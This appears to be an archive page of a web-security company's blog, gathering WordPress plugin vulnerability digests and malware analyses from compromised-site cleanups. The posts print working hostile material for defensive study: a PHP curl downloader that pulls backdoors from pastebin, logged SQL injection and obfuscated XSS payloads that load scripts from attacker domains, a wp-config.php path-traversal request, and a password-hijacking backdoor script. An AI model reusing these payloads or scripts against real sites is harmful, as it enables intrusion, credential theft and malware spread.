Hacked Websites Archives

Vulnerable Plugins: June 2020 Update

This is a mid-month update to our regular Monthly Vulnerability Digest, which reveals a number of new patches for disclosed vulnerabilities.

Plugin	Vulnerability	Patched Version	Installs
Elementor Page Builder	Authenticated Stored XSS	2.9.10	5000000
AdRotate	Authenticated SQL Injection	5.8.4	40000
Brizy - Page Builder	Improper Access Controls	1.0.126	60000
Careerfy	Unauthenticated XSS	3.9.0	5000
SportsPress	Authenticated Stored XSS	2.7.2	20000
JobSearch	Unauthenticated XSS	1.5.1	5000
Newspaper	Unauthenticated XSS	10.3.4	6000
Multi Scheduler	Record Deletion CSRF	--	20

Highlights

Cross-site scripting is the most common vulnerability in WordPress plugins
None of these plugins have been identified in massive attacks

Relevant Plugins

SportsPress

Sportspress fixed an authenticated stored cross-site scripting vulnerability in version 2.7.2. This vulnerability allows authenticated attackers to arbitrarily update the “sportspress_event_teams_delimiter” plugin option, allowing for the potential execution of malicious scripts every time the site is loaded.

Since this bug is really easy for attackers to exploit in malware campaigns, we’ve been following it closely but haven’t detected any massive abuses as an attack vector. We believe this is primarily due to the fact that the vulnerability exploit requires access to a compromised user within the vulnerable site.

Patch:

Index: sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php
===================================================================
--- a/sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php
+++ b/sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php         
         if ( isset( $_POST['sportspress_event_teams_delimiter'] ) )
-            update_option( 'sportspress_event_teams_delimiter', $_POST['sportspress_event_teams_delimiter'] );
+            update_option( 'sportspress_event_teams_delimiter', sanitize_text_field( $_POST['sportspress_event_teams_delimiter'] ) );
 }

AdRotate

Adrotate fixed an authenticated SQL Injection in version 5.8.4. We haven’t detected any massive automated attacks targeting this plugin.

Patch:

    if(isset($_GET['status'])) $status = esc_attr($_GET['status']);
     if(isset($_GET['view'])) $view = esc_attr($_GET['view']);
     if(isset($_GET['id'])) $id = esc_attr($_GET['id']);
     if(isset($_GET['file'])) $file = esc_attr($_GET['file']);
+
+    if(!is_numeric($status)) $status = 0;
+    if(!is_numeric($id)) $id = 0;

The majority of the public vulnerabilities in this mid-month update require the possession of a user account within the vulnerable site, which reduces the odds of any massive infections.

That being said, to mitigate risk from these recently patched vulnerabilities we strongly encourage all affected users to update their plugins as soon as possible.

Jun 19, 2020 by John Castro

Malicious Curl Downloader

If you want to easily download and save remote files, curl is an excellent command-line tool for Windows and Unix. It supports HTTP, HTTPS, and FTP protocols and allows for custom HTTP headers, which makes it a common feature in some of the malware we find on compromised sites.

For example, during a recent cleanup we found this malicious script using curl to download code from pastebin.com and save it into a local file on the website.

<?php 

chmod($_SERVER['DOCUMENT_ROOT']."/wp-load.php", 0644);
chmod($_SERVER['DOCUMENT_ROOT']."/index.php", 0644);
chmod($_SERVER['DOCUMENT_ROOT']."/.htaccess", 0644);
chmod($_SERVER['DOCUMENT_ROOT']."/wp-load.php", 0644);
chmod($_SERVER['DOCUMENT_ROOT']."/index.php", 0644);
chmod($_SERVER['DOCUMENT_ROOT']."/.htaccess", 0644);

function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}

$hector0 = $_SERVER['DOCUMENT_ROOT'] . "/.htaccess" ;
$hectortxt2 = http_get('hxxps://pastebin.com/raw/VgBTWCqv');
file_put_contents($hector0, $hectortxt2);

$hector777 = $_SERVER['DOCUMENT_ROOT'] . "/index.php" ;
$hectortxt777 = http_get('hxxps://pastebin.com/raw/ELF1BqnD');
$open777 = fopen($hector777, 'w');
fwrite($open777, $hectortxt777);
fclose($open777);

?>

The http_get function initiates curl and downloads the malicious content before file_put_contents is used to save the malicious content into the appropriate file. fwrite was also used for some reason, likely for compatibility purposes.

In this case, the malicious code is downloading additional backdoors and malware — but the pastebin.com file defined here can be easily modified to instruct the malware to download anything the attacker wants.

One of the best methods to prevent and detect the modification of your index.php files is to set up tighter file permissions that restrict write access and employ a file integrity monitoring tool to notify you of any changes. Or, simply use a website firewall to mitigate the compromise in the first place.

Jun 2, 2020 by Krasimir Konov

Vulnerabilities Digest: May 2020

Relevant Plugins and Vulnerabilities:

Plugin	Vulnerability	Patched Version	Installs
WP Product Review	Unauthenticated Stored XSS	3.7.6	40000
Form Maker by 10Web	Authenticated SQL Injection	---	100000
Add-on SweetAlert Contact Form 7	Authenticated XSS	1.0.8	20
Paid Memberships Pro	Authenticated SQL Injection	2.3.3	90000
Visual Composer	Authenticated XSS	27	80000
Team Members	Authenticated XSS	5.0.4	40000
Photo Gallery by 10Web	Unauthenticated SQL Injection	1.5.55	300000
Login/Signup Popup	Authenticated XSS	1.5	10000
Easy Testimonials	Authenticated Stored XSS	3.6	30000
WooCommerce	Unescaped Metadata	4.1.0	5000000
Page Builder by SiteOrigin	CSRF to XSS	2.10.16	1000000
Chopslider	Authenticated SQL Injection	---	200
Elementor Pro	Authenticated File Upload	2.9.4	100000
LearnPress	Privilege Escalation	3.2.6.9	80000
Elementor	Authenticated Stored XSS	2.9.8	4000000
Avada	Authenticated Stored XSS	6.2.3	500000
Ninja Forms	CSRF to Stored XSS	3.4.24.2	1000000
Advanced Order Export For Woo	Authenticated XSS	3.1.4	90000
Quick Page/Post redirect	Authenticated Settings Update	---	100000
Ultimate Addons for Elementor	Registration Bypass	1.24.2	100000
WTI Like Post	Authenticated XSS	---	10000
WP-Advanced-Search	Authenticated SQL Injection	3.3.7	1000
Gmedia Photo Gallery	Authenticated XSS	1.18.5	10000

Highlights for May 2020

Cross site scripting is still the most prevalent vulnerability. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.
Unprotected AJAX action bugs are still on the rise. Attackers aren’t hesitating to automate malicious injections for vulnerable plugins.
Attackers have added three plugins and a series of new malicious IPs to their arsenal in an ongoing massive malware campaign targeting WordPress websites with known vulnerabilities.

Details for these highlights can be found under the components listed below.

WP Product Review

Two weeks ago, we reported an Unauthenticated Stored Cross Site Scripting in WP Product Review caused by a lack of protection in a rest route definition and improper handling of user input.

Only a few days after the disclosure of this vulnerability, attackers began to scan for vulnerable sites:

181.58.21.65 - - [18/May/2020:17:21:10 +0000] "GET //wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"

139.198.16.241 - - [18/May/2020:17:15:36 +0000] "GET //wp-content/plugins/wp-product-review/readme.txt HTTP/1.1" 

185.162.127.248 - - [17/May/2020:03:38:15 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1" 

213.159.210.170 - - [17/May/2020:01:35:04 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"

Patch (version 3.7.6):

Index: wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
===================================================================
--- a/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
+++ b/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
@@ -97,4 +97,7 @@
                 'methods'  => 'POST',
                 'callback' => array( $this, 'update_review_callback' ),
+                'permission_callback' => function () {
+                    return current_user_can( 'edit_posts' );
+                },
                 'args'     => array(
                     'id' => array(

---

Index: wp-product-review/trunk/includes/functions.php
===================================================================
--- a/wp-product-review/trunk/includes/functions.php
+++ b/wp-product-review/trunk/includes/functions.php
@@ -229,5 +229,5 @@
         }
         ?>
-        <a title="<?php echo $review_object->get_name(); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank">
+        <a title="<?php echo esc_attr( $review_object->get_name() ); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank">
             <img
                 src="<?php echo esc_attr( $src ); ?>"

Elementor

Earlier this month, the plugin Elementor Pro fixed an arbitrary file upload vulnerability caused by an unprotected Ajax hook. It wasn’t long before attackers started exploiting this vulnerability.

Our team identified these malicious IPs trying to detect plugin installations for both Elementor Pro and Ultimate Addons for Elementor:

69.164.207.140 - - [08/May/2020:15:59:31 +0000] "GET /wp-content/plugins/elementor-pro/assets/js/preview.min.js HTTP/1.1" 

45.79.193.100 - - [08/May/2020:16:49:13 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/css/modules/business-hours.css HTTP/1.1" 

62.210.172.66 - - [10/May/2020:02:33:29 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/min-js/uael-registration.min.js HTTP/1.1" 

62.210.84.69 - - [13/May/2020:08:13:57 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1" 

62.210.172.66 - - [13/May/2020:08:21:05 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1" 

[...]

Photo Gallery by 10Web

An unauthenticated SQL Injection was fixed this month in the plugin Photo Gallery.

Patch (version 1.5.55):

Index: photo-gallery/trunk/frontend/models/model.php
===================================================================
--- a/photo-gallery/trunk/frontend/models/model.php
+++ b/photo-gallery/trunk/frontend/models/model.php
@@ -197,32 +197,32 @@

   public function get_alb_gals_row( $bwg, $id, $albums_per_page, $sort_by, $order_by, $pagination_type = 0, $from = '' ) {
-    if ( $albums_per_page < 0 ) {
+    if ( $albums_per_page < 0 ) {
       $albums_per_page = 0;
     }
     global $wpdb;
-    $order_by = 'ORDER BY </span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span><span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span>$from<span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span><span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '> ' . $order_by;
-    if( $sort_by == 'random' || $sort_by == 'RAND()' ) {
-      $order_by = 'ORDER BY RAND()';
-    }
-    $search_where = '';
-    $search_value = trim( WDWLibrary::get('bwg_search_' . $bwg) );
-    if ( !empty($search_value) ) {
-      $search_keys = explode(' ', $search_value);
+    $order_by = 'ORDER BY </span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span> $from <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '> ' . $order_by;
+    if ( $sort_by == 'random' || $sort_by == 'RAND()' ) {
+      $order_by = 'ORDER BY RAND()';
+    }
+    $search_where = '';
+    $search_value = trim( WDWLibrary::get( 'bwg_search_' . $bwg ) );
+    if ( !empty( $search_value ) ) {
+      $search_keys = explode( ' ', $search_value );
       $alt_search = '(';
       $description_search = '(';

Payload Used by Attackers:

185.162.127.248 -- POST -- /wp-admin/admin-ajax.php -- action=bwg_frontend_data&bwg_search_0=1%23+%25DFGDFG%22%29%29%2F%2A%2A%2FUNION%2F%2A%2A%2FALL%2F%2A%2A%2FSELECT%2F%2A%2A%2FTABLE_SCHEMA%2CTABLE_NAME%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2F%2A%2A%2Fas%2F%2A%2A%2Fdummy_3%2F%2A%2A%2Ffrom%2F%2A%2A%2Finformation_schema.tables%23FGDFGDFG%29%29%23&gallery_type=album_compact_preview&type_0=album -- 2020-05-17

Plugin & Theme Payloads Added to Ongoing Campaign

Malicious Domains & Detected IPs

Our team saw the following new malicious domains injected into an ongoing campaign exploiting known WordPress vulnerabilities this month:

css[.]digestcolect[.]com
cls[.]balantfromsun[.]com
count[.]trackstatisticsss[.]com

The following IPs have also been associated with this campaign:

79.133.202.70
154.43.128.23
185.162.127.248
51.83.70.152
213.159.210.170
139.162.28.41
139.99.169.192
185.217.0.224
84.238.108.177
62.210.180.8
[...]

Exploit Attempts Seen in the Wild

Our team identified attacks against the following vulnerable plugins and themes.

Bold Page Builder (From Last Year)

139.162.28.41 -- POST -- /wp-admin/admin-ajax.php?action=bt_bb_set_custom_css -- css=%3C%2Fstyle%3E%3Cscript++type%3Dtext%2Fjavascript+language%3Djavascript%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C99%2C108%2C115%2C46%2C98%2C97%2C108%2C97%2C110%2C116%2C102%2C114%2C111%2C109%2C115%2C117%2C110%2C46%2C99%2C111%2C109%2C47%2C99%2C108%2C115%2C46%2C106%2C115%2C63%2C122%2C61%2C54%2C38%2C39%2C59%2C10%2C32%2C32%2C32%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C104%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cstyle%3E&post_id=1 -- 2020-05-12

WP Quick Booking Manager (from 4 years ago)

139.162.28.41 - action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Fcss.digestcolect.com%2Fstm%3Fv%3Dl6.0.0%27%3E%3C%2Fscript%3E%3Cstyle%3E&cssfix=front [12/May/2020:04:52:19 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Duplicator Download

62.210.180.8 - - [14/May/2020:14:45:54 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1"

Many other plugins are still under attack and public exploits already exist for all of the components listed above. Please check our previous lab notes for more information about this ongoing WordPress Malware campaign.

To mitigate threat, we strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.

May 29, 2020 by John Castro

B374k Web Shell Packer

PHP web shells are a type of backdoor which, when left on compromised websites, allow attackers to maintain unauthorized access after initial compromise.

To further evade detection, attackers may also choose to keep a packer script on a compromised website instead of the actual PHP web shell. They can then use this script to generate the PHP web shell on an as-needed basis.

One of the more common PHP web shells is b374k.php. It’s popular with bad actors because it offers a lot of features including a file manager, database connect, various text conversions, and email via PHP.

Let’s take a look at how attackers can load b374k.php with a packing script, seen below.

This unknown shell packer offers a few different options to the attacker:

Output - Defines the filename of the PHP web shell to be created
Password - Sets a password used to limit access to the PHP web shell
Module - Optional features that can be enabled: convert, database, info, mail, network, processes
Theme - Optional color theme
Strip Comments and Whitespaces - Removes unneeded code comments and whitespaces
Base64 Encode - encodes the PHP web shell’s code with base64
Compress - Compresses the PHP code with various PHP functions like gzdeflate, gzencode, gzcompress. This feature requires the code to have already been base64 encoded.

Attackers can also run the packer by submitting the parameters through PHP CLI, if available.

Regardless of whether the attacker opts for the PHP CLI or the browser GUI, the result is a generated PHP shell with the chosen filename — in this case unknown.php — which is dropped in the current directory.

These types of malicious scripts can be found planted anywhere within a website’s environment, so the best way to mitigate threat is to prevent unauthorized access to your website in the first place. Practice strong password security principles and use a firewall to prevent a password from brute force.

May 13, 2020 by Luke Leal

Innocent Defacement

When we talk about defacements, we’re usually referring to attacks leading to a visual takeover of a website’s page ― consider it a form of vandalism or graffiti.

Often distributed by hacktivists via political motivation, defacements usually include one of the following scenarios: either the attacker has replaced the existing page with content related to a specific theme like raising awareness to a particular website vulnerability or a political topic, or simply hosting general information about the attacker to get some “street rep”.

Once in a while, we find a defacement that doesn’t really fit either of these scenarios. For example, our colleague Kaushal Bhavsar recently found this defacement that seemed to have only one sole objective: to be really annoying.

When visiting the site, users see the overlay (above) with absolutely no way to minimize or remove it from the interface. And while this may not seem like an obvious website threat, this clearly indicates a compromised environment.

Here is the code that the attacker injected into the theme’s footer.php file to serve the unwanted pop-up:

<?php
<script>
jQuery(document).ready(function(){
    jQuery('body').append('<div class="alert-box" style="display: block;position: fixed;top: 0;right: 0;left: 0;width: 50%;background-color: white;text-align: center;margin: 0 auto;margin-top: 19%;border: 4px solid red;border-radius: 10px;padding-top: 15px;padding-bottom: 15px;z-index: 99999999999;"><p style="color: red;font-size: 18px;height: auto;line-height: initial;margin-bottom: 2px;">NOTICE!</p><p style="color: red;font-size: 18px;height: auto;line-height: initial;margin-bottom: 2px;">Owner of  https://REDACTED.com </p><p style="margin-bottom: 0px;color: red;font-size: 18px;height: auto;line-height: initial;">This website is not equipped with readability feature for Visually impaired!</p></div>');
});
</script>

?>

This defacement may seem strange, but we can speculate on why it was added to the website. Perhaps the attacker was trying to be annoying or raise awareness to the fact that the website was vulnerable?

Luckily, the attacker didn’t include more disruptive malware or unsavory content, but the effects of this compromise could have been devastating.

To mitigate risk, we encourage website owners to keep an eye out for any changes to website files. Website monitoring solutions can help you detect code anomalies, modifications like this defacement, and other indicators of compromise on your website.

Mar 13, 2020 by Cesar Anjos

Malicious WordPress User Hijacker

Our analyst Liam Smith recently found a malicious file with the name wp-atom2.php on a compromised WordPress site that had been infected with pharma spam. The spam content had been found injected into the _postmeta table within the WordPress database.

The malicious wp-atom2.php file loads wp-config.php using the require_once function, which contains the database’s host, username, and password information. The attacker can then use this MySQL connection information to authenticate with the MySQL database for the targeted WordPress website.

If the attacker simply loads the file in the browser, the output will just include an array of the data found within the _users table of the WordPress database:

$sql = $mysqli->query("SELECT * FROM {$table_prefix}users LIMIT 0, 10 ");
while($rows = $sql->fetch_assoc()) {
?>
    <pre>
<?php print_r($rows); ?>
    </pre>

This _users table output is extremely helpful to the attacker — it contains information that can be used to create a backdoor and maintain unauthorized access to the compromised environment.

The ID value can be used to select the user that the attacker wants to change the password for. To change the password, the attacker just needs to submit a crafted GET request with the ID and pass or new parameter.

If pass is used, the attacker can provide their own MD5 hash value to be inserted into the user ID that is included in their HTTP GET request:

/wp-atom2.php?pass=21232f297a57a5a743894a0e4a801fc3&id=2

require_once('wp-config.php');
$mysqli = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
if ( isset($_GET['pass']) ) {
    $id  = (isset($_GET['id']) ? (int) $_GET['id'] : 1);
    $pas = $_GET['pass'];
    if (isset($pas)) {
        $mysqli->query("UPDATE {$table_prefix}users SET user_pass = '{$pas}' WHERE ID = '{$id}'");
    }

If the attacker uses new, a password value doesn’t need to be provided at all. Instead, the script defaults to the password 12345 for the provided user ID. It then goes on to use the function wp_signon to authenticate the new password and generate a hyperlink to /wp-admin that the attacker can click on for direct access to the /wp-admin interface.

/wp-atom2.php?new&id=2

} elseif ( isset($_GET['new']) ) {
    $id  = (isset($_GET['id']) ? (int) $_GET['id'] : 1);
    $mysqli->query('UPDATE '.$table_prefix.'users SET user_pass = \'$P$BLIwZyiB0J2XvUAsNyKQI1hyEMox0A0\' WHERE ID = \''.$id.'\'');
    $creds = array();
    $sql = $mysqli->query("SELECT user_login FROM {$table_prefix}users WHERE ID = '{$id}' LIMIT 0, 1");
    $row = $sql->fetch_assoc();    $creds['user_login']     = $row['user_login'];
    $creds['user_password'] = '12345';
    $creds['remember']         = true;    
$user = wp_signon( $creds, false );    
if ( is_wp_error($user) ) {
       echo $user->get_error_message();
    } else { echo '<a href="/wp-admin/" target="_blank">Log into deep</a>'; }
}

The best way to mitigate risk and detect malicious activity is to leverage a website monitoring solution to identify indicators of compromise within your environment.

Feb 25, 2020 by Luke Leal

Stored XSS in Elementor

Exploitation Level: Easy/Requires Authentication
DREAD Score: 8.0
Vulnerability: Stored XSS
Patched Version: 2.7.6

During a routine audit of WordPress plugins last december, we discovered a Stored XSS vulnerability in the very popular Elementor Page Builder plugin, which powers no less than 3 million+ websites according to the official active installs count.

Are You Affected?

This vulnerability is exploitable on sites which allow users to have accounts and are using Elementor versions lower than 2.7.6, released last December.

A successful attack results in malicious scripts being injected on the plugin’s System Info page. If an administrator visits that page, the malicious Javascript code can execute privileged actions on the victim’s behalf, like creating new administrative accounts or storing backdoors on the site to maintain access.

Indicators of Compromise

This vulnerability can be exploited via the WordPress AJAX endpoint /wp-admin/admin-ajax.php.

Depending on the exploit, website owners may be able to flag attacks in access logs by looking for requests from unknown IPs containing action=elementor_js_log in the request.

Conclusion & Mitigation Steps

To protect against this vulnerability, we strongly encourage users of the Elementor Page Builder to update their site to the latest version available as soon as possible — 2.8.5 at the time of writing.

Users who are unable to update immediately can leverage the Sucuri Firewall or equivalent technology to virtually patch the vulnerability.

Jan 29, 2020 by MarcAlexandre Montpas